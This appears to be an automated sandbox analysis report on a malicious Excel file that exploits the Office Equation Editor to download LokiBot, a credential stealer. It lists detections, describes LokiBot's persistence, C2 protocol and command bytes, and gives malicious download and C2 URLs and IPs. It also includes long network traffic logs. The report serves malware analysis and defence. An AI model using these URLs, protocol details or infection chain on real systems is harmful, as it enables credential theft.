Windows Analysis Report
MV_TRANS-ASIA_I.xls

Overview

General Information

Sample Name: MV_TRANS-ASIA_I.xls
Analysis ID: 1274208
MD5: 0c13eceb36bdde5263a3e2ecc3339407
SHA1: 19d9f3512d1d0e0ec66fe8fec4efd149f4287e1f
SHA256: fffb8dde88ae23cc6c9b00e3692bfe33242ebfde732dc0b0f4a445b729985fc5
Tags: xls

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Detected unpacking (overwrites its own PE header)
Yara detected Lokibot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Yara detected aPLib compressed binary
Tries to steal Mail credentials (via file registry)
Shellcode detected
Excel sheet contains many unusual embedded objects
Office equation editor drops PE file
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Searches the installation path of Mozilla Firefox
Enables debug privileges
Office Equation Editor has been started
Contains functionality to download and launch executables
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

Name: Loki Password Stealer (PWS), LokiBot

Description:

"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe

Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.

Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.

The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.

Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\C98066\.

There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:

FILE EXTENSION   FILE DESCRIPTION
.exe             A copy of the malware that will execute every time the user account is logged into
.lck             A lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts
.hdb             A database of hashes for data that has already been exfiltrated to the C2 server
.kdb             A database of keylogger data that has yet to be sent to the C2 server

If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.

The first packet transmitted by Loki-Bot contains application data.
The second packet transmitted by Loki-Bot contains decrypted Windows credentials.
The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.

Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.

The first WORD of the HTTP Payload represents the Loki-Bot version.
The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:

BYTE   PAYLOAD TYPE
0x26   Stolen Cryptocurrency Wallet
0x27   Stolen Application Data
0x28   Get C2 Commands from C2 Server
0x29   Stolen File
0x2A   POS (Point of Sale?)
0x2B   Keylogger Data
0x2C   Screenshot

The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!

Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.

The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot's C2 infrastructure.

Loki-Bot can accept the following instructions from the C2 Server:

BYTE   INSTRUCTION DESCRIPTION
0x00   Download EXE & Execute
0x01   Download DLL & Load #1
0x02   Download DLL & Load #2
0x08   Delete HDB File
0x09   Start Keylogger
0x0A   Mine & Steal Data
0x0E   Exit Loki-Bot
0x0F   Upgrade Loki-Bot
0x10   Change C2 Polling Frequency
0x11   Delete Executables & Exit

Suricata Signatures

RULE SID   RULE NAME
2024311    ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected
2024312    ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1
2024313    ET TROJAN Loki Bot Request for C2 Commands Detected M1
2024314    ET TROJAN Loki Bot File Exfiltration Detected
2024315    ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1
2024316    ET TROJAN Loki Bot Screenshot Exfiltration Detected
2024317    ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2
2024318    ET TROJAN Loki Bot Request for C2 Commands Detected M2
2024319    ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2

Attribution:
  • SWEED
  • The Gorgon Group
  • Cobalt

Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

AV Detection

Source: http://185.252.179.165/Desktop/dwmfs.exe$ Avira URL Cloud: Label: malware
Source: http://185.252.179.165/Desktop/dwmfs.exetC: Avira URL Cloud: Label: malware
Source: http://185.252.179.165/Desktop/dwmfs.exeC: Avira URL Cloud: Label: malware
Source: http://185.252.179.165/Desktop/dwmfs.exej Avira URL Cloud: Label: malware
Source: http://185.252.179.165/Desktop/dwmfs.exe Avira URL Cloud: Label: malware
Source: http://185.252.179.165/Desktop/dwmfs.exeU Avira URL Cloud: Label: malware
Source: http://185.252.179.165/Desktop/dwmfs.exeT Avira URL Cloud: Label: malware
Source: http://185.252.179.165/Desktop/dwmfs.exejjC: Avira URL Cloud: Label: malware
Source: http://171.22.30.147/mous/five/fre.php Avira URL Cloud: Label: malware
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
Source: MV_TRANS-ASIA_I.xls ReversingLabs: Detection: 26%
Source: MV_TRANS-ASIA_I.xls Virustotal: Detection: 42%
Source: MV_TRANS-ASIA_I.xls Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dwmfs[1].exe ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy) ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dwmfs[1].exe Joe Sandbox ML: detected

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 185.252.179.165 Port: 80
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Compliance

Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Unpacked PE file: 5.2.IBM_Centosie.exe.400000.1.unpack
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: [C:\zocaka_wobihos\zaliwufanamin-xosusemof\81\duner.pdb source: IBM_Centosie.exe, 00000005.00000000.1068812593.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe, 0000000E.00000002.1286061645.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe, 0000000E.00000000.1245572476.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe.2.dr, dwmfs[1].exe.2.dr
Source: Binary string: C:\zocaka_wobihos\zaliwufanamin-xosusemof\81\duner.pdb source: IBM_Centosie.exe, IBM_Centosie.exe, 0000000E.00000002.1286061645.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe, 0000000E.00000000.1245572476.0000000000401000.00000020.00000001.01000000.00000005.sdmp, IBM_Centosie.exe.2.dr, dwmfs[1].exe.2.dr
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 5_2_00403D74

Software Vulnerabilities

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03640533 ShellExecuteW,ExitProcess, 2_2_03640533
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03640505 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03640505
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03640488 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03640488
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036404A2 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_036404A2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0364040A URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_0364040A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036403D5 ExitProcess, 2_2_036403D5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0364051E ShellExecuteW,ExitProcess, 2_2_0364051E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03640558 ExitProcess, 2_2_03640558
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_03590488 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 12_2_03590488
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_03590505 URLDownloadToFileW,ShellExecuteW,ExitProcess, 12_2_03590505
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_03590533 ShellExecuteW,ExitProcess, 12_2_03590533
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_03590558 ExitProcess, 12_2_03590558
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_0359051E ShellExecuteW,ExitProcess, 12_2_0359051E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_035903D5 ExitProcess, 12_2_035903D5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_0359040A URLDownloadToFileW,ShellExecuteW,ExitProcess, 12_2_0359040A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 12_2_035904A2 URLDownloadToFileW,ShellExecuteW,ExitProcess, 12_2_035904A2
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 185.252.179.165:80 -> 192.168.2.22:49183
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49183 -> 185.252.179.165:80
Source: global traffic TCP traffic: 192.168.2.22:49184 -> 171.22.30.147:80
